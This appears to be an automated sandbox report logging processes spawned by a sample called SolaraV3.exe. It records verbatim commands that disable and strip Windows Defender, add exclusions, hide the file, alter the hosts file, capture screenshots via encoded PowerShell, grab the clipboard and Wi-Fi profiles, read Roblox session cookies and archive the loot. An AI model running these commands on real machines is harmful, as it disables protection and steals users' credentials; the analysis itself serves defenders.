Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
